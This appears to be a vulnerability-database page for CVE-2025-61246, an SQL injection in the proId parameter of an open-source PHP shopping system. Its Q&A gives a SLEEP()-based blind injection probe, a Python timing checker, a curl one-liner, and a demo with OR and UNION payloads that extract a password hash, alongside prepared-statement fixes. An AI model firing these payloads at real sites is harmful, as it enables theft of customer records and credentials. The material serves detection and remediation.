CVE-2025-61246
BaseFortify
Publication date: 2026-01-08
Last updated on: 2026-01-16
Assigner: MITRE
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| indieka900 | online_shopping_system | 1.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-89 | The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-61246 is a SQL injection vulnerability (CWE-89) in version 1.0 of the indieka900 online shopping system (listed above as online_shopping_system; the source repository is named online-shopping-system-php). The master/review_action.php script embeds the proId request parameter directly into a SQL query, with no escaping and no parameterization, so a remote attacker can append SQL of their own to the review lookup. From there they can read data from any table the application's database account can see (user records, credential hashes, stored payment details), modify or delete rows, and, where that account has been granted more than the application needs, take administrative actions on the database server. Remote code execution is possible only under such configurations; it is a property of the database privileges, not of the injection itself. [1]
How can this vulnerability impact me?
Successful exploitation exposes whatever the application's database account can read: customer records, credentials and any stored payment data, which is a data breach in itself. Credential hashes obtained this way can be cracked or reused to log in as other users, including administrators, and write access lets the attacker alter or delete records. Full system compromise, including remote code execution, is reachable only under certain configurations, for example an over-privileged database account, and should be planned for as the worst case rather than assumed as the default outcome. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
The quickest confirmation is a time-based blind test against the proId parameter of master/review_action.php, run only against a system you are authorised to test. Send the parameter with a benign value a few times and note the response time, then send the advisory's probe: proId=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -. If the probe consistently takes about five seconds longer than the baseline, the parameter is being interpreted as SQL; vary the sleep value (for example 3, then 8) to rule out network jitter. The PoC repository provides an automated Python script (exploit.py) that performs this check and exploits the flaw, and manual testing instructions in MANUAL_TESTING.md. The commands amount to sending crafted POST requests carrying the payload to the vulnerable endpoint and measuring the response delay. On the defensive side, search any logs that capture POST bodies (a WAF or reverse proxy, not a plain web server access log) for proId values containing a quote, SLEEP( or a comment sequence (--, #, /*), and review the script's source for a query string built by concatenating the request value. [1]
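As an added example (not code from the advisory, the PoC repository or the indieka900 project), the following Python script performs the timing check described above: it learns a baseline from benign requests, sends the advisory's SLEEP() probe in the proId parameter, and flags the endpoint only when the probe adds most of the requested delay. The target URL is a placeholder, the 80% threshold is a heuristic, and the two simulate_* transports are constructed stand-ins for a vulnerable and a fixed review_action.php so the logic can be exercised offline.

```python
"""Time-based blind SQL injection check for one POST parameter.

Added example, not from the advisory or the indieka900 project. The benign
value is sent first to learn a baseline, then the SLEEP() probe quoted in the
advisory; the parameter is reported as injectable only when the probe run
exceeds the baseline by most of the requested sleep.
"""
import re
import sys
import time
import urllib.parse
import urllib.request

# Probe from the advisory, with the sleep length as a template field.
ADVISORY_PAYLOAD = "1' AND (SELECT 1 FROM (SELECT(SLEEP({n})))a)-- -"


def http_post(url, fields, timeout=60):
    """Real transport: form-encoded POST; the body is discarded, only timing matters."""
    data = urllib.parse.urlencode(fields).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        resp.read()


def timed(send, url, fields):
    """Seconds taken by one request through the given transport."""
    start = time.monotonic()
    send(url, fields)
    return time.monotonic() - start


def check_time_based_sqli(url, param, send=http_post, sleep_seconds=5, samples=3):
    """Return (vulnerable, baseline_seconds, probe_seconds).

    The baseline is the slowest of `samples` benign requests, so ordinary jitter
    is not mistaken for SLEEP(); the probe must still add >= 80% of the sleep
    (heuristic threshold, an assumption of this example).
    """
    baseline = max(timed(send, url, {param: "1"}) for _ in range(samples))
    probe = ADVISORY_PAYLOAD.format(n=sleep_seconds)
    probe_seconds = timed(send, url, {param: probe})
    vulnerable = (probe_seconds - baseline) >= 0.8 * sleep_seconds
    return vulnerable, baseline, probe_seconds


# --- constructed offline stand-ins for master/review_action.php -------------

def _fake_mysql(sql):
    """Pretend MySQL: honours SLEEP(n) only if it appears in the SQL text itself."""
    m = re.search(r"SLEEP\((\d+)\)", sql)
    if m:
        time.sleep(int(m.group(1)))


def simulate_vulnerable_endpoint(url, fields):
    # Unpatched pattern: proId is concatenated into the statement, so the
    # attacker's SLEEP() becomes part of the query the engine executes.
    sql = "SELECT * FROM product WHERE proId = '" + fields["proId"] + "'"
    _fake_mysql(sql)


def simulate_patched_endpoint(url, fields):
    # Prepared-statement pattern: the SQL text is fixed and proId travels as a
    # bound value, so SLEEP() never reaches the parser as SQL.
    sql = "SELECT * FROM product WHERE proId = ?"
    _bound = (fields["proId"],)  # would be passed to execute(sql, params)
    _fake_mysql(sql)


if __name__ == "__main__":
    # Usage (placeholder URL): python3 sqli_timing_check.py http://target.example/master/review_action.php
    target = sys.argv[1] if len(sys.argv) > 1 else "http://target.example/master/review_action.php"
    vuln, base, probe = check_time_based_sqli(target, "proId")
    print(f"baseline={base:.2f}s probe={probe:.2f}s vulnerable={vuln}")
```

The same measurement by hand is one curl call per value, comparing `time_total` for the benign value against the probe: `curl -s -o /dev/null -w '%{time_total}\n' --data-urlencode "proId=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -" http://target.example/master/review_action.php` (URL is a placeholder).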
What immediate steps should I take to mitigate this vulnerability?
Immediate steps: fix master/review_action.php so that proId is passed to the database as a bound parameter of a prepared statement (mysqli or PDO in PHP) instead of being concatenated into the query string, and validate it as an integer before use; audit the rest of the code base for the same concatenation pattern, since an application that builds one query this way usually builds others the same way; run the application's database account with the least privilege it needs (no file or administrative privileges, no access to unrelated schemas) so that any remaining injection cannot be escalated to server compromise; deploy WAF rules that block SQL injection patterns as a temporary shield, not as the fix; apply the upstream fix if the project publishes one; and rotate credentials stored in the database if prior exploitation cannot be ruled out. [1]
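To make the fix concrete, here is an added example (not the project's code) contrasting the concatenation pattern with a parameterized query. It uses Python's built-in sqlite3 and a constructed schema so it runs offline; the table and column names (reviews, users, password_hash) and the sample rows are assumptions, and in the PHP application the same change is made with a mysqli or PDO prepared statement bound to proId.

```python
"""Vulnerable vs. parameterized lookup of reviews by proId.

Added example, not code from the indieka900 project. reviews_vulnerable()
mirrors the string-building pattern the advisory describes; reviews_safe()
binds proId as a parameter. Schema and rows are constructed for the demo.
"""
import sqlite3


def build_db():
    """Constructed sample data: reviews keyed by proId plus a users table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE reviews (id INTEGER PRIMARY KEY, proId INTEGER, text TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO reviews VALUES (1, 1, 'Great'), (2, 1, 'OK'), (3, 2, 'Bad');
        INSERT INTO users VALUES (1, 'admin', '$2y$10$constructedhashvalue');
    """)
    return conn


def reviews_vulnerable(conn, pro_id):
    # Attacker-controlled text becomes SQL syntax: the quote in pro_id closes
    # the literal and everything after it is parsed as part of the statement.
    sql = "SELECT id, text FROM reviews WHERE proId = '" + pro_id + "' ORDER BY id"
    return conn.execute(sql).fetchall()


def reviews_safe(conn, pro_id):
    # The statement text is constant; pro_id is sent as a value and compared as
    # data, so quotes, OR and UNION inside it have no syntactic effect.
    sql = "SELECT id, text FROM reviews WHERE proId = ? ORDER BY id"
    return conn.execute(sql, (pro_id,)).fetchall()


def validate_pro_id(raw):
    """Defence in depth: the id is numeric, so reject anything else before querying."""
    if not raw.isdigit():
        raise ValueError("proId must be a positive integer")
    return int(raw)


# Two classic payloads for a quoted string context (constructed for the demo).
PAYLOAD_OR = "1' OR '1'='1"
PAYLOAD_UNION = "1' UNION SELECT id, password_hash FROM users-- -"

if __name__ == "__main__":
    db = build_db()
    print(reviews_vulnerable(db, PAYLOAD_OR))     # every review, not only proId 1
    print(reviews_vulnerable(db, PAYLOAD_UNION))  # product 1 reviews plus the admin hash
    print(reviews_safe(db, PAYLOAD_UNION))        # [] : payload compared as data
    print(reviews_safe(db, str(validate_pro_id("1"))))
```

Parameterization alone defeats both payloads; the integer check is the second layer, so that a malformed proId is rejected with an error before the database is touched.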
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The vulnerability allows attackers to extract sensitive data such as user information, credentials, and payment data, which can lead to data breaches. Such breaches can result in non-compliance with data protection regulations like GDPR and HIPAA, which mandate the protection of personal and sensitive information. Therefore, exploitation of this SQL Injection vulnerability can negatively impact compliance with these standards by exposing protected data. [1]